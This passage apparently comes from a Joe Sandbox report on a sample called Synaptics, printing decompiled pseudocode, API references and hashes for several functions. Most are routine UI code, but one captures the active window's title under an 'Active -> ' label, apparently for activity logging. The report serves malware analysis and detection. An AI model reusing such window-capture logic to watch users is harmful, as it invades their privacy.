                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77218E74B04314EFD701DF69D88188DBBF5FB48720B5281AAE844A7791D778EE90CA98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004769AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                            			E004769AC(void* __ebx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				int _t28;
				intOrPtr _t32;
				void* _t37;
				intOrPtr* _t45;
				struct HWND__* _t48;
				intOrPtr _t55;
				intOrPtr _t67;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_t67);
				_push(0x476a7b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67;
				_t48 =  *(__edx + 4);
				if(_t48 > 0) {
					E0040500C( &_v8, GetWindowTextLengthA(_t48));
					_t28 = E00404C80(_v8) + 1;
					GetWindowTextA(_t48, E00404E80(_v8), _t28);
					_t32 =  *0x49ec6c; // 0x0
					E00408FF8(_t32,  &_v12);
					_push(_v12);
					E00408FF8(_v8,  &_v16);
					_pop(_t37);
					E00404DCC(_t37, _v16);
					if(_t28 != 0) {
						E00408FF8(_v8,  &_v20);
						if(_v20 != 0) {
							E00404A14(0x49ec6c, _v8);
							E00404CCC( &_v24, _v8, "Active -> ");
							_t45 =  *0x49ec44; // 0x21e4a50
							 *0x49ec48 =  *((intOrPtr*)( *_t45 + 0x38))();
						}
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(0x476a82);
				return E004049E4( &_v24, 5);
			}















                                                                                                                                                                                                                            0x004769b1
                                                                                                                                                                                                                            0x004769b2
                                                                                                                                                                                                                            0x004769b3
                                                                                                                                                                                                                            0x004769b4
                                                                                                                                                                                                                            0x004769b5
                                                                                                                                                                                                                            0x004769b9
                                                                                                                                                                                                                            0x004769ba
                                                                                                                                                                                                                            0x004769bf
                                                                                                                                                                                                                            0x004769c2
                                                                                                                                                                                                                            0x004769c5
                                                                                                                                                                                                                            0x004769ca
                                                                                                                                                                                                                            0x004769db
                                                                                                                                                                                                                            0x004769e8
                                                                                                                                                                                                                            0x004769f4
                                                                                                                                                                                                                            0x004769fc
                                                                                                                                                                                                                            0x00476a01
                                                                                                                                                                                                                            0x00476a09
                                                                                                                                                                                                                            0x00476a10
                                                                                                                                                                                                                            0x00476a18
                                                                                                                                                                                                                            0x00476a19
                                                                                                                                                                                                                            0x00476a1e
                                                                                                                                                                                                                            0x00476a26
                                                                                                                                                                                                                            0x00476a2f
                                                                                                                                                                                                                            0x00476a39
                                                                                                                                                                                                                            0x00476a49
                                                                                                                                                                                                                            0x00476a51
                                                                                                                                                                                                                            0x00476a5b
                                                                                                                                                                                                                            0x00476a5b
                                                                                                                                                                                                                            0x00476a2f
                                                                                                                                                                                                                            0x00476a1e
                                                                                                                                                                                                                            0x00476a62
                                                                                                                                                                                                                            0x00476a65
                                                                                                                                                                                                                            0x00476a68
                                                                                                                                                                                                                            0x00476a7a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowTextLengthA.USER32(?), ref: 004769D1
                                                                                                                                                                                                                            • GetWindowTextA.USER32 ref: 004769F4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: TextWindow$Length
                                                                                                                                                                                                                            • String ID: Active ->
                                                                                                                                                                                                                            • API String ID: 1006428111-2811066380
                                                                                                                                                                                                                            • Opcode ID: 9c2bd60ce560c34ec15292e01b66b22b42b6ec1e64ee9c7bd280641d29b5e087
                                                                                                                                                                                                                            • Instruction ID: d9f40d637c3a14713fae2ad8e053e9984e8428a736acad8caa5444ef25058333
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c2bd60ce560c34ec15292e01b66b22b42b6ec1e64ee9c7bd280641d29b5e087
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C215774600209DFD704EBA5C9829AFB3B9EF45704B61857BF505B3351DB78AE00CA68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043B290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E0043B290(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t31;
				void* _t36;
				intOrPtr _t42;
				struct HDC__* _t47;
				void* _t50;

				_push(__esi);
				_v16 = 0;
				_t36 = __eax;
				_push(_t50);
				_push(0x43b326);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xfffffff4;
				if( *((intOrPtr*)(__eax + 0x30)) == 0) {
					_v12 =  *((intOrPtr*)(__eax + 8));
					_v8 = 0xb;
					_t31 =  *0x49dc4c; // 0x422f30
					E00406A70(_t31,  &_v16);
					E0040D180(_t36, _v16, 1, __edi, __esi, 0,  &_v12);
					E00404378();
				}
				_t47 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x30)))) + 0x48))();
				SetViewportOrgEx(_t47,  *(_t36 + 0x40),  *(_t36 + 0x44), 0);
				IntersectClipRect(_t47, 0, 0,  *(_t36 + 0x48),  *(_t36 + 0x4c));
				_pop(_t42);
				 *[fs:eax] = _t42;
				_push(0x43b32d);
				return E004049C0( &_v16);
			}











                                                                                                                                                                                                                            0x0043b297
                                                                                                                                                                                                                            0x0043b29a
                                                                                                                                                                                                                            0x0043b29d
                                                                                                                                                                                                                            0x0043b2a1
                                                                                                                                                                                                                            0x0043b2a2
                                                                                                                                                                                                                            0x0043b2a7
                                                                                                                                                                                                                            0x0043b2aa
                                                                                                                                                                                                                            0x0043b2b1
                                                                                                                                                                                                                            0x0043b2b6
                                                                                                                                                                                                                            0x0043b2b9
                                                                                                                                                                                                                            0x0043b2c6
                                                                                                                                                                                                                            0x0043b2cb
                                                                                                                                                                                                                            0x0043b2da
                                                                                                                                                                                                                            0x0043b2df
                                                                                                                                                                                                                            0x0043b2df
                                                                                                                                                                                                                            0x0043b2ec
                                                                                                                                                                                                                            0x0043b2f9
                                                                                                                                                                                                                            0x0043b30b
                                                                                                                                                                                                                            0x0043b312
                                                                                                                                                                                                                            0x0043b315
                                                                                                                                                                                                                            0x0043b318
                                                                                                                                                                                                                            0x0043b325

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0043B2F9
                                                                                                                                                                                                                            • IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 0043B30B
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClipIntersectLoadRectStringViewport
                                                                                                                                                                                                                            • String ID: 0/B
                                                                                                                                                                                                                            • API String ID: 2734429277-1373906003
                                                                                                                                                                                                                            • Opcode ID: dd4e2505df968acfab6a3d175d575ed0f78135dd417b7fa3dcb2f09e0321a6e9
                                                                                                                                                                                                                            • Instruction ID: e8a904d80b5f428ce4efa45f7181a255eb87ff5514a318c6dca8c784068d0644
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd4e2505df968acfab6a3d175d575ed0f78135dd417b7fa3dcb2f09e0321a6e9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25112E71A04204AFDB04DF99DC91FAE77A8EB49304F5040BAFE00EB291DB75AD00CB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043B338 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0043B338(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E0041ACC8( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E0041AC6C(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E0043A91C(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}








                                                                                                                                                                                                                            0x0043b341
                                                                                                                                                                                                                            0x0043b34e
                                                                                                                                                                                                                            0x0043b361
                                                                                                                                                                                                                            0x0043b365
                                                                                                                                                                                                                            0x0043b3b5
                                                                                                                                                                                                                            0x0043b3b5
                                                                                                                                                                                                                            0x0043b367
                                                                                                                                                                                                                            0x0043b367
                                                                                                                                                                                                                            0x0043b367
                                                                                                                                                                                                                            0x0043b371
                                                                                                                                                                                                                            0x0043b377
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043b37f
                                                                                                                                                                                                                            0x0043b384
                                                                                                                                                                                                                            0x0043b398
                                                                                                                                                                                                                            0x0043b3af
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043b3af
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043b3b1
                                                                                                                                                                                                                            0x0043b3b1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043b367
                                                                                                                                                                                                                            0x0043b3b9
                                                                                                                                                                                                                            0x0043b3c2

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Rect$EqualIntersect
                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                            • API String ID: 3291753422-2766056989
                                                                                                                                                                                                                            • Opcode ID: 01dbe2ffe655930e8f7d0d4300ba91ed27844ee93d0c63831fe6078eb240f3e5
                                                                                                                                                                                                                            • Instruction ID: ff87b59c4918c05e59a4b882000aa20bb8e2e27f5e52085d9b15fe210c2257fb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01dbe2ffe655930e8f7d0d4300ba91ed27844ee93d0c63831fe6078eb240f3e5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E118C31A042585BC711DA6DC889BDF7BE8AF49328F044296FD04EB382D779ED0587D5
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042C794 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E0042C794(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x49e92b != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x49e90c; // 0x42c794
					 *0x49e90c = E0042C4FC(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x49e90c(_a4, _a8, _t19);
				}
				return _t16;
			}













                                                                                                                                                                                                                            0x0042c79a
                                                                                                                                                                                                                            0x0042c7a4
                                                                                                                                                                                                                            0x0042c7ce
                                                                                                                                                                                                                            0x0042c7d7
                                                                                                                                                                                                                            0x0042c7ff
                                                                                                                                                                                                                            0x0042c7ff
                                                                                                                                                                                                                            0x0042c7d9
                                                                                                                                                                                                                            0x0042c7d9
                                                                                                                                                                                                                            0x0042c7de
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042c7de
                                                                                                                                                                                                                            0x0042c7a6
                                                                                                                                                                                                                            0x0042c7ab
                                                                                                                                                                                                                            0x0042c7b8
                                                                                                                                                                                                                            0x0042c7ca
                                                                                                                                                                                                                            0x0042c7ca
                                                                                                                                                                                                                            0x0042c80a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C7E2
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C7F4
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MetricsSystem$AddressProc
                                                                                                                                                                                                                            • String ID: MonitorFromPoint
                                                                                                                                                                                                                            • API String ID: 1792783759-1072306578
                                                                                                                                                                                                                            • Opcode ID: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                                                                                                                                                                                            • Instruction ID: 3a8d409507ccd0e879ce772a810bcfc943f8b0dcea0ef563c0c7703c31a9de97
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6cdc29a5e44f7e0585e2ae4c63b37bf951fe99bc70721fab0bf04256813ce94d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3201A271301128AFDB10AF56ECC8B5EBB55EB90366FC0C037F9059B251C378AC008B68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042C66C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                                                                                            			E0042C66C(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x49e92a != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x49e908; // 0x42c66c
					 *0x49e908 = E0042C4FC(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x49e908(_t14, _t17);
				}
				return _t19;
			}












                                                                                                                                                                                                                            0x0042c672
                                                                                                                                                                                                                            0x0042c675
                                                                                                                                                                                                                            0x0042c67f
                                                                                                                                                                                                                            0x0042c6a4
                                                                                                                                                                                                                            0x0042c6ad
                                                                                                                                                                                                                            0x0042c6d4
                                                                                                                                                                                                                            0x0042c6d4
                                                                                                                                                                                                                            0x0042c681
                                                                                                                                                                                                                            0x0042c686
                                                                                                                                                                                                                            0x0042c693
                                                                                                                                                                                                                            0x0042c6a0
                                                                                                                                                                                                                            0x0042c6a0
                                                                                                                                                                                                                            0x0042c6df

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C6BD
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C6C9
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MetricsSystem$AddressProc
                                                                                                                                                                                                                            • String ID: MonitorFromRect
                                                                                                                                                                                                                            • API String ID: 1792783759-4033241945
                                                                                                                                                                                                                            • Opcode ID: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                                                                                                                                                                                            • Instruction ID: ff17a17d24a28b56e0f59b29e5112e5d3ba35734792e5f6c57e17e57efd49fd6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0505ff08604382a2a7a56eddc592a15d0ad7eb215b3b37d6f2a53d4f1b45624d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1601A771301128ABD760CB05F8C9B1A7755E764361F845077E805CB246C778EC40CBAC
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0044AE70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0044AE70(void* __eax) {
				void* _t16;
				intOrPtr _t17;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x34)) == 0) {
					_t17 =  *0x449b38; // 0x449b84
					if(E00403D78( *((intOrPtr*)(__eax + 4)), _t17) == 0) {
						 *((intOrPtr*)(_t16 + 0x34)) = CreateMenu();
					} else {
						 *((intOrPtr*)(_t16 + 0x34)) = CreatePopupMenu();
					}
					if( *((intOrPtr*)(_t16 + 0x34)) == 0) {
						E00449F18();
					}
					E0044AC00(_t16);
				}
				return  *((intOrPtr*)(_t16 + 0x34));
			}





                                                                                                                                                                                                                            0x0044ae71
                                                                                                                                                                                                                            0x0044ae77
                                                                                                                                                                                                                            0x0044ae7c
                                                                                                                                                                                                                            0x0044ae89
                                                                                                                                                                                                                            0x0044ae9a
                                                                                                                                                                                                                            0x0044ae8b
                                                                                                                                                                                                                            0x0044ae90
                                                                                                                                                                                                                            0x0044ae90
                                                                                                                                                                                                                            0x0044aea1
                                                                                                                                                                                                                            0x0044aea8
                                                                                                                                                                                                                            0x0044aea8
                                                                                                                                                                                                                            0x0044aeaf
                                                                                                                                                                                                                            0x0044aeaf
                                                                                                                                                                                                                            0x0044aeb8

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
                                                                                                                                                                                                                            • CreateMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE95
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateMenu$Popup
                                                                                                                                                                                                                            • String ID: .B
                                                                                                                                                                                                                            • API String ID: 257293969-2011479308
                                                                                                                                                                                                                            • Opcode ID: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
                                                                                                                                                                                                                            • Instruction ID: ec3ec204bd3e4010e8879658da88cb666e7af430c2d7f16cc051fc7c4e83f06b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0806c6a46482751433e2ade30357662471cd1d52e2604d1811d61facdbb405b4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFE06D306822008FEB50EF65DAC564A3BA8AF05309F9034BAA8119F347C738DC958B5A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%